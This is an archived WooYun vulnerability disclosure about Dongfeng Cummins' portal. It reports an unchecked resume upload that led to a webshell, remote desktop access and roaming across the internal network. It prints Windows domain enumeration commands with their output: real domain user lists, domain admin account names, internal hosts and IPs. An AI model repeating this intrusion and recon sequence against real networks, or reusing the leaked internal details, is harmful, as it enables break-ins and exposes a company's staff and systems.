乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-23: 细节已通知厂商并且等待厂商处理中 2015-01-28: 厂商已经确认,细节仅向厂商公开 2015-02-07: 细节向核心白帽子及相关领域专家公开 2015-02-17: 细节向普通白帽子公开 2015-02-27: 细节向实习白帽子公开 2015-03-09: 细节向公众公开
东风康明斯发动机有限公司门户网站某漏洞getshell至内网漫游
东风康明斯发动机门户网站
职位申请,上传简历页面,未做服务器验证,改包上传
获取到WEBSHELL
远程桌面连接至门户网站:
网卡情况:Windows IP Configuration Host Name . . . . . . . . . . . . : dcecssy057t Primary Dns Suffix . . . . . . . : dcec.easia.cummins.com Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : dcec.easia.cummins.com easia.cummins.com cummins.comEthernet adapter 本地连接 2: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Microsoft Virtual Machine Bus Network Adapter #2 Physical Address. . . . . . . . . : 00-15-5D-00-C9-34 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 192.168.113.57 Subnet Mask . . . . . . . . . . . : 255.255.254.0 Default Gateway . . . . . . . . . : 192.168.112.1 DNS Servers . . . . . . . . . . . : 192.168.112.26 192.168.112.27
域用户列表:
net user /domain 域用户列表这项请求将在域 dcec.easia.cummins.com 的域控制器处理。\\DCECDC4.dcec.easia.cummins.com 的用户帐户-------------------------------------------------------------------------------0090ACA0-277D-491B-A 2A268D4E-D5DA-4840-9 4A3719B1-A67A-401F-9 636801E5-CC48-4D96-A 67047B41-A430-44B9-8 6BBA8B4C-3A9B-4134-9 932F26A5-8BFF-41FB-8 acsadmin admindept administrator ASPNET atpuadmin Audit audit617 avladmin B4AD6363-9641-4435-8 baradm barvpn bfcec BN147 BN151 BN154 BN156 BN166 BP247 BP249 BP896 canway01 CanwayTest cba_anonymous ccaad ccanew ccauser ccauser2 ccauser3 CDMS CDMSU CE040 CE455 CE959 CF489 CF873 cisconac CJ622 CJ624 CJ697 CL584 CL626 CM024 CM075 CM101 CM426 CM585 CM962 CN052 CN119 CN120 cn121 CN132 CN546 CN549 CN599 CN600 CN833 CO023 CO467 CO842 CO855 CP456 CP527 CP549 CP648 CQ263 CQ336 CQ405 CQ406 CQ452 CQ467 CQ668 CQ669 CQ670 CQ712 CR032 CR228 CR289 CR290 CR291 CR387 CR852 crmadmin crmmail CS122 CS142 CS143 CS221 CS865 CT014 CT046 CT198 CT613 CT629 CT766 CT825 CU619 cummin5adm1n CV160 CV161 CV267 CW256 CW477 cwtest22 cwtest23 cwtest24 CX579 CX906 CX909 CX910 CX912 CX913 CX914 CX916 CX918 D5255984-3E7A-4E36-8 DA828 dadmin dadmin.app dadmin.gao dbackup dbagent dcecadmin DCECCRM01 dcecedi dceclyncssrs dcecmcis dcecmonitor dcecnews dcecprint dcecprint01 dcecprint02 dcecprint03 dcecprint04 dcecpublic DCECSRMII dcecssy041 dcecsw df000 DF044 DF149 DF454 DF477 df478 df478a DF480 DF482 DF483 DF486 DF488 DF495 DF496 DF498 DF499 DF501 DF506 DF507 DF508 DF510 DF511 df516 DF520 DF521 DF523 DF524 DF525 DF533 DF537 DF538 DF539 DF540 DF541 df542 DF543 DF544 DF547 DF548 DF549 DF550 DF551 DF552 DF553 DF555 DF556 DF559 DF563 DF565 DF566 DF567 DF570 DF571 DF573 DF574 DF575 DF577 DF578 DF579 DF580 DF582 DF583 DF585 DF587 DF588 DF589 DF590 DF592 DF593 DF647 DF648 DF651 DF652 DF658 DF666 DF669 DF670 DF672 DF673 DF674 DF675 DF677 DG088 DG093 DG096 DG098 DG099 DG100 DG101 DG102 DG103 DG106 DG107 DG114 DG115 DG116 DG117 DG121 DG122 DG123 DG126 DG127 DG131 DG132 DG135 DG136 DG138 DG141 DG146 DG147 DG148 DG150 DG151 DG152 DG155 DG157 DG230 DG377 DG380 DG382 DG385 DG784 DG785 DH374 DH421 DH523 DI276 DI278 DI280 DI283 DI287 DI290 DI296 DI298 DI302 DI303 DI305 DI306 DI308 DI309 DI311 DI312 DI314 DI317 DI318 DI319 DI320 DI321 DI322 DI325 DI326 DI328 di329 DI330 DI331 DI332 DI333 DI334 DI335 DI338 DI339 DI341 di343 DI344 DI346 DI348 DI350 DI351 DI352 DI355 DI356 DI359 DI360 DI361 DI362 DI363 DI364 DI366 DI367 DI368 DI369 DI370 DI372 DI377 DI381 DI382 DI384 DI385 DI386 DI388 DI390 DI392 DI396 DI398 DI402 DI403 DI404 DI405 DI408 DI410 DI412 DI413 DI415 DI418 DI422 DI423 DI426 DI428 DI429 DI431 DI432 DI433 DI434 DI435 DI436 DI437 DI438 DI439 DJ606 DK796 DK885 Dk889 DK890 DKRHY DL817 DL818 DL820 DL822 DL824 DL825 DL829 Dpuser1 dpuser2 dpuser3 dpuser4 DR545 DR547 DR549 DR550 DS833 DS834 DS835 DS836 DS837 DS838 DS839 DS840 DS841 DS852 DS854 DU117 DU118 DU119 DU122 DU124 DU127 DU129 DU130 DU131 DU133 DU134 DU135 DU136 E95A0DD6-ECF4-4474-A EA507 edi37 edi56 EK167 Elearn ER990 ES147 ES148 ES368 ES409 ES410 ES475 ES542 ES543 ES754 ES755 ES757 ES758 escreen ET201 ET257 ET285 ET286 ET287 ET289 ET290 ET291 ET298 ET311 ET313 ET315 ET316 ET317 ET319 ET320 ET384 ET385 ET386 ET387 ET388 ET398 ET402 ET511 ET529 ET536 ET580 ET581 ET600 EU318 EUQ_DCECSSY099 EV086 EV431 EV848 EV891 EV895 EV901 EW053 EW135 EW153 EW196 EW199 EW313 EW478 EW537 EW540 EW555 EW576 EW634 EW675 EW738 EW739 EW758 EW776 EW790 EW795 EW825 EW838 EW839 EW885 EW897 EW906 EW926 EW938 EW950 EW980 ex198 EXO ext EY275 EY290 EY501 EY722 EY723 EY804 EZ138 EZ294 EZ295 EZ340 EZ595 EZ596 EZ628 EZ629 F141AADA-DDB4-436E-A F6D2D1F5-03BA-4968-9 F877CCF6-4F9D-48C0-9 FA021 FA022 FA140 FA294 FA745 FA818 FA956 fauser01 FB214 FC023 FC358 FC605 FC606 FC895 FE028 FE031 FE032 FE475 Ff088 fi736 fileadmin fj591 fj592 fj593 fj595 fj623 fj624 fj625 fj645 fj648 fj893 FK994 flyyoung FM181 FM182 FM263 FM268 FM735 FN333 fn509 FO854 FO919 FO995 FP037 FP038 FP443 FP682 FP683 FP895 FP962 fq968 FR174 FV612 FV894 FV956 fx629 FY350 fy901 fy903 fy905 fy906 fy932 fy944 fy946 FZ880 FZ881 ga399 gettime gf474 GH294 GI052 GJ457 GJ458 gl911 GL912 GM870 GM871 GN309 GO652 GO843 GO990 GO992 GP107 GP512 GP513 gptestuser GQ370 guest251 gv511 gw378 gw634 gw682 gw719 gw760 gw830 GWTAdmin GWTCW GWTkms001 GWTkms002 GWTkms003 GWTkms004 GWTkms005 GWTkms006 GWTkms007 GWTkms008 GWTkms009 GWTkms010 GWTkms011 GWTrfuser HB685 hd966 helpdesk hg560 hi221 hj539 hm731 hn518 ho409 ho470 ho539 ho556 HR Information-Check hrd001 hrd002 hrd003 hs004 ht397 hx429 hx866 hx981 hy100 hy645 hy980 ic778 ican ican1 ie094 ig371 ih666 io415 iq951 iq952 ir293 ir294 is154 is175 is177 is263 is359 is759 it158 it318 it320 it586 ITControl iuser_dcecssy008 IUSR_DCECBDC1 IUSR_DCEC-EJT3J4XEB5 IUSR_DCEC-O89MRJBHJ7 IUSR_DCECPDC IUSR_DCECPDC1 IUSR_DCECPDC2 IUSR_DCECPDC3 IUSR_DCECSSY093 IUSR_DCEC-T94CI0BGBP IUSR_DCEC-XNFPFYLZI0 IUSR_SERVER1 iv066 iv342 iv784 iv829 IWAM_DCECBDC1 IWAM_DCEC-EJT3J4XEB5 IWAM_DCEC-O89MRJBHJ7 IWAM_DCECPDC IWAM_DCECPDC1 IWAM_DCECPDC2 IWAM_DCECPDC3 IWAM_DCECSSY093 IWAM_DCEC-T94CI0BGBP IWAM_DCEC-XNFPFYLZI0 IWAM_SERVER1 ix470 IY743 iy745 IY888 ja773 jb060 jb205 jb206 jb208 jb230 jc116 jc323 jf166 ji563 ji564 jj885 jk527 jl441 jn302 jn534 jo446 jp325 jq117 jq122 ju088 ju402 ju406 ju520 jv635 JV795 JZ287 JZ735 JZ914 KA976 KA978 KC053 KC417 KC427 KC928 KC935 KE320 KE923 KF429 KF430 KF786 KH283 KH286 KI675 KI704 KM543 KM798 kn086 KN824 ko877 KO953 KP234 KQ571 KQ853 kr106 KR582 krbtgt KT589 KT590 KT591 KT592 KT595 KT678 KT679 KT681 KT682 KT684 KT685 kt687 KT688 ku097 ku497 kv714 kv871 kv886 KY656 KZ158 KZ159 KZ345 kz773 kz775 kz777 kz989 kz990 kz994 LA044 la266 LA270 la734 la866 la876 la878 landesk landesk02 LC309 le326 LF235 LH179 LH889 li967 LJ013 LJ303 lj673 lj845 lk379 lk380 lk502 lk509 ll960 lo015 lo016 lo017 lo018 lo019 lo020 lo022 lo023 lo024 lo025 lo026 lo027 lo030 lo031 lo032 lo448 lo557 ls582 lu303 lv617 lv957 lw547 lw747 lw753 lw832 lyncuser ma172 ma173 mail01 mail02 mail03 mail04 mail05 mailcluster mailtest mailtest1 maximo mb557 mb990 md913 md915 mdt2010 me711 me712 me898 me899 me905 me906 me908 me909 me910 me911 me912 me913 me914 me915 me916 me917 me920 me921 me922 me923 me924 me929 mf015 mf132 mf267 mf273 mf866 MG01 mg137 mi225 mj795 mj796 mks1 mks2 ml696 mn986 mq392 mq393 mq626 MQV mstech mu627 mu628 mu629 mu638 mu639 mu640 mu641 mu642 mu643 mu644 mu645 mu650 mu725 mxadmin nac001 nac002 nac003 nac004 nac005 nac006 nace oam OAMOBILE01 OAMOBILE02 oauser OAuser01 OAuser02 OAuser03 OAzysj01 OAzysj02 PD001 PD002 PD003 PD004 PD005 ped1 pfsmadmin PFSMSYS plmuser PMSAdmin POC ppif ppif242 projectservice QAD01 QAD02 QAD03 QAD04 qad05 qadadmin qaduser QIS01 qis02 qis03 qisadmin qist qistest remoteuser reportadmin rfuser rmsadmin RMSSRVC RoomA101 RoomA115 RoomA128 RoomA211 RoomA237 RoomA238 RoomA240 RoomA241 RoomA301 RoomA312 RoomA325 RoomA338 RoomB109 RoomB222 RoomC111 RoomC201 RoomC217 RoomC218 RoomMKS RoomPED301 RoomPED401 RoomPUR RoomTraining01 RoomTraining02 RTCArchivingService RTCComponentService RTCGuestAccessUser RTCService sccm2012 scvmm_service scvmm_sql SinforAC SM_be3792c5d524441c9 SM_cba9198633484e3ca SM_fbec1968c24d45a18 SM_fe03e4cf4f9549258 SMEX Administrator smsadmin SMSClient_007 smst SPC sp-wlm SQLAdmin sqluser srmadmin svrin swuser test001 Test01 test02 Test03 Test04 test05 test06 test07 test1 test123 testidc testmail testuser TPL TPL1 TPL2 TPL3 TPL4 TPL5 TPMTEST user01 webuser wluser1 wluser2 wluser3 wluser4 wluser5_IT wscreen YZX_Supplier Z270 zy001 zy002 zy003 zy004 zy005 zy006 zy007 zy008 zy009 zy010 zy011 zy012 zy013 zy014 zy015 zy016 zy017 zy018 zy019 zy020 zy021 zy022 zy023 zy024 zy025 zy026 zy027 zy028 zy029 zy030 zy031 zy032 zy033 zy034 zy035 zy036 zy037 zy038 zy039 zy040 zy041 zy042 zy043 zy045 zy046 zy047 zy048 zy049 zy050 zy051 zy052 zy053 zy054 zy055 zy056 zy057 zy058 zy059 zy060 zy061 zy062 zy063 zy064 zy065 zy066 zy067 zy068 zy069 zy070 zy071 zy072 zy073 zy074 zy075 zy076 zy077 zy078 zy079 zy080 zy081 zy082 zy083 zy084 zy085 zy086 zy087 zy088 zy089 zy090 zy091 zy092 zy093 zy094 zy095 zy096 zy097 zy098 zy099 zy100 zy101 zy102 zy103 zy104 zy105 zy106 zy107 zy108 zy109 zy110 zy111 zy112 zy113 zy114 zy115 zy116 zy117 zy118 zz000 zz0000 zz002 ZZ003 ZZ005 ZZ006 ZZ007 zz008 zz009 zz011 zz012 zz013 ZZ017 ZZ018 ZZ019 zz021 zz023 zz024 zz027 zz030 zz032 zz039 zz040 zz043 zz044 zz045 zz046 zz047 zz048 zz050 zz052 zz053 zz057 zz058 zz061 zz065 zz066 zz067 zz068 zz072 zz073 zz074 zz075 zz076 zz077 zz078 zz079 zz081 zz083 zz084 zz085 zz090 zz092 zz093 zz094 zz095 zz098 zz100 zz101 zz102 zz103 zz104 zz107 zz108 zz109 zz110 zz111 zz119 zz121 zz123 zz125 zz126 zz127 zz136 zz138 zz139 zz140 zz141 zz142 zz143 zz145 zz146 zz147 zz148 zz149 zz150 zz151 zz154 zz155 zz156 zz157 zz159 zz163 zz164 zz165 zz166 zz169 zz170 zz175 zz176 zz178 zz179 zz180 zz183 zz184 zz185 zz186 zz187 zz188 zz189 zz190 zz191 zz192 zz193 zz194 zz195 zz196 zz197 zz198 zz199 zz201 zz202 zz203 zz205 zz206 zz207 zz211 zz212 zz213 zz215 zz217 zz220 zz221 zz223 zz228 zz229 zz230 zz231 zz234 zz235 zz238 zz241 zz243 zz252 zz253 zz254 zz255 zz256 zz257 zz258 zz259 zz260 zz261 zz262 zz264 zz267 zz268 zz272 zz273 zz274 zz275 zz279 zz280 zz281 zz282 zz283 zz284 zz285 zz289 zz290 zz291 zz292 zz293 zz295 zz296 zz297 zz299 zz300 zz302 zz305 zz306 zz307 zz311 zz312 zz313 zz317 zz319 zz328 zz333 zz335 zz336 zz338 zz339 zz340 zz346 zz351 zz361 zz365 zz366 zz368 zz369 zz370 zz375 zz377 zz386 zz387 zz391 zz396 zz397 zz401 zz405 zz406 zz408 ZZ411 zz412 zz413 zz415 zz418 zz419 zz430 zz431 zz433 zz436 zz437 zz440 zz441 zz442 zz443 zz445 zz447 zz449 zz450 zz451 zz452 zz453 zz454 zz456 zz457 zz458 zz459 zz460 zz461 zz462 zz463 zz464 zz466 zz467 zz468 zz469 zz470 zz471 zz475 zz476 zz478 zz479 zz480 zz482 zz483 zz484 zz487 zz488 zz489 zz490 zz491 zz493 zz494 zz495 zz496 zz497 zz498 zz500 zz501 zz502 zz503 zz504 zz505 zz506 zz507 zz508 zz509 zz510 zz513 zz515 zz520 zz521 zz528 zz530 zz534 zz535 zz546 zz548 zz551 zz554 zz555 zz556 zz557 zz558 zz559 zz560 zz561 zz562 zz565 zz566 zz568 zz570 zz571 zz573 zz576 zz579 zz584 zz585 zz586 zz588 zz589 zz591 zz592 zz593 zz596 zz597 zz598 zz599 zz600 zz604 zz605 zz606 zz610 zz616 zz617 zz618 zz621 zz623 zz626 zz630 zz631 zz634 zz636 zz636a zz637 zz638 zz639 zz641 zz642 zz643 zz644 zz646 zz647 zz649 zz651 zz653 zz654 zz656 zz658 zz659 zz661 ZZ664 ZZ665 ZZ666 ZZ667 ZZ668 zz668a ZZ669 ZZ670 ZZ671 ZZ672 ZZ674 ZZ676 ZZ678 ZZ679 ZZ680 ZZ681 ZZ682 ZZ683 ZZ684 ZZ685 ZZ686 ZZ687 ZZ690 ZZ692 ZZ694 ZZ696 ZZ698 ZZ699 ZZ700 ZZ703 ZZ705 ZZ707 ZZ709 ZZ712 ZZ714 ZZ715 ZZ720 ZZ722 zz724 zz725 zz726 ZZ727 ZZ729 zz731 zz732 ZZ733 ZZ734 ZZ743 ZZ744 ZZ745 ZZ747 ZZ748 ZZ749 ZZ750 ZZ753 ZZ754 ZZ755 ZZ760 ZZ762 ZZ763 ZZ764 ZZ767 ZZ768 ZZ776 ZZ778 ZZ779 ZZ780 ZZ781 ZZ782 ZZ783 ZZ784 ZZ786 ZZ787 ZZ788 ZZ789 ZZ790 ZZ791 ZZ792 ZZ796 ZZ799 zz799a ZZ800 ZZ801 ZZ802 ZZ803 ZZ804 ZZ805 ZZ806 ZZ807 ZZ809 ZZ811 ZZ813 ZZ814 ZZ815 ZZ816 ZZ817 ZZ818 ZZ819 ZZ820 ZZ821 ZZ823 ZZ824 ZZ825 ZZ826 ZZ827 ZZ829 ZZ830 ZZ831 ZZ833 ZZ834 ZZ835 ZZ837 ZZ838 ZZ839 ZZ842 ZZ843 zz843a ZZ844 ZZ845 ZZ846 ZZ847 ZZ848 ZZ849 ZZ850 ZZ851 ZZ852 ZZ854 ZZ855 ZZ856 ZZ858 ZZ859 ZZ860 ZZ861 ZZ862 ZZ863 ZZ864 ZZ865 ZZ866 ZZ867 ZZ868 ZZ869 ZZ870 zz871 zz872 zz873 zz874 zz875 zz876 zz877 zz878 zz879 zz880 zz881 zz882 zz883 zz884 zz885 zz886 zz887 zz888 zz889 zz890 zz891 zz892 zz893 zz895 zz896 zz897 zz898 ZZ899 zz900 zz901 zz903 ZZ904 ZZ905 ZZ906 zz907 zz908 zz909 zz910 zz912 zz913 zz915 zz916 zz917 zz918 zz920 zz921 zz922 zz923 zz924 zz925 zz926 zz927 zz928 zz929 zz930 zz931 zz932 zz933 zz934 zz935 zz936 zz937 zz938 zz939 zz940 zz941 zz942 zz942a zz945 zz946 zz947 zz948 zz949 zz950 zz999 命令成功完成。
查看内网存在的域
C:\Documents and Settings\zz799>net view /domainDomain------------------------------------------------------ATPUDCECDCEC_ISBEDCECSPCMSHOMESYSTECHSYTECHWORKGROUPZJSOFT命令成功完成。
获取域管理员列表:
C:\Documents and Settings\zz799>net group "domain admins" /domain这项请求将在域 dcec.easia.cummins.com 的域控制器处理。组名 Domain Admins注释 Designated administrators of the domain成员-------------------------------------------------------------------ccaad cummin5adm1n dadmindadmin.app dadmin.gao dcecadminmstech命令成功完成。
列出内网计算机
C:\Documents and Settings\zz799>net view服务器名称 注释---------------------------------------------\\ACS01\\ACS02\\APPSQL\\CRMTEST\\CRMTEST02\\DATA\\DCECBOBCAT_HOST\\DCECCAS03\\DCECCAS04\\DCECDAG\\DCECDC1\\DCECDC2\\DCECDC3\\DCECDC4\\DCECLIC\\DCECLYNC01\\DCECLYNC02\\DCECLYNCARS\\DCECLYNCDB01\\DCECMBX01\\DCECMBX02\\DCECMX01 IBM Blade 2012 #1\\DCECMX02 IBM Blade 2012 #2\\DCECMX05\\DCECODP\\DCECRCA\\DCECSCA\\DCECSCOM\\DCECSST009\\DCECSST016BB\\DCECSST043T\\DCECSST044\\DCECSST050\\DCECSST053\\DCECSST061\\DCECSST067\\DCECSST082\\DCECSST149\\DCECSST157\\DCECSST158\\DCECSST160\\DCECSSY005\\DCECSSY007\\DCECSSY007N\\DCECSSY009 dce\\DCECSSY010\\DCECSSY012\\DCECSSY013W\\DCECSSY014\\DCECSSY015\\DCECSSY016BB\\DCECSSY017\\DCECSSY020\\DCECSSY021\\DCECSSY022\\DCECSSY023\\DCECSSY032\\DCECSSY032BB\\DCECSSY033\\DCECSSY037\\DCECSSY038\\DCECSSY042\\DCECSSY043\\DCECSSY045\\DCECSSY046\\DCECSSY054\\DCECSSY055 PPTP VPN\\DCECSSY057T\\DCECSSY060\\DCECSSY066\\DCECSSY082\\DCECSSY086\\DCECSSY087\\DCECSSY088\\DCECSSY089\\DCECSSY094\\DCECSSY095\\DCECSSY0A2\\DCECSSY101\\DCECSSY103\\DCECSSY107\\DCECSSY108\\DCECSSY121\\DCECSSY126\\DCECSSY132\\DCECSSY141\\DCECSSY142\\DCECSSY145\\DCECSSY148\\DCECSSY149\\DCECSSY175\\DCECSSY178\\DCECSSY179\\DCECSSYLOG Dcecssylog\\DCECSSYVG2 EMC-SNAS:T7.0.54.5\\DCECTPM01\\DCECTPM02\\DCECTPM03\\DCECUMS01\\DCECVM\\DCECVM01\\DCECVM02\\DCECVM04\\DCECVMM2012\\DCECWDP\\DCX909R8P5GLP\\DCX918FVL3H2X\\DDG096R8P5GLV\\DDI344R8P5GND\\DDI408DX23H2X\\DDK890JVL3H2X\\DDS852PBWKKW6\\DES757R8P5GHN\\DET386R8N3WBY\\DFC606R8N3WCH\\DFM735PBWKKZ3\\DGJ458CVL3H2X\\DZY084R8N0YRT\\DZY093R8P5GKF\\DZY094R8N3WCB\\DZZ019R8N9FMX\\DZZ050R8N3WBW\\DZZ052R8N3WAA\\DZZ0538VL3H2X\\DZZ067S07578036\\DZZ090PBWKKZ8\\DZZ092S07578026\\DZZ098PBWKLC5\\DZZ108R8N3WAH\\DZZ279R8N0YRV\\DZZ284R8P5GMN\\DZZ415PBWKKV2\\DZZ443R8P5GHX\\DZZ445S07578022\\DZZ488PBWKKY5\\DZZ504R8N3VWM\\DZZ508R8P5GMX\\DZZ554PBWKLG0\\DZZ5707133H2X\\DZZ5962TL3H2X\\DZZ597R8N3VYW\\DZZ617PBWKKY0\\DZZ670R8N3WBZ\\DZZ826R8N9FMN\\DZZ843PBWKLC0\\DZZ848R8N3VYY\\DZZ860R8P5GML\\DZZ889R8N3VXP\\DZZ926PBWKLA8\\DZZ935R8N3VZB\\DZZ945R8N3VYG\\EATPUDP\\ISDE_OP10\\LCN121P11E7E3\\LDG127P11CBMT\\LDI402P16DX47\\LEW906P11CBR5\\LKU497P11CBPX\\LZY011PBL2H6P\\LZY036P11CP3M\\LZZ011P16DX3W\\LZZ272P11E7D8\\LZZ377P11CBNM\\LZZ412P16DX39\\LZZ74717B0RM1\\LZZ847P16DX1W\\MDT2010\\METS\\NASDS1\\PRINTER\\QADTEMP\\SCCM2012\\SCDPM2012\\SQL01\\SQL02\\SQLCLU01\\T-PBK64PT\\T-PBWKLE9\\VCENTER\\WSUS2012\\XCECWARRANTY xcecwarranty命令成功完成。
通过某种方式获取到域控管理员账号密码,任意登录漫游内网
登录CRM系统,如上图所示,相关敏感信息:
边界漏洞导致内网被渗透,可任意漫游,厂商尽快修补,敏感信息太多。
危害等级:高
漏洞Rank:12
确认时间:2015-01-28 10:25
CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。
暂无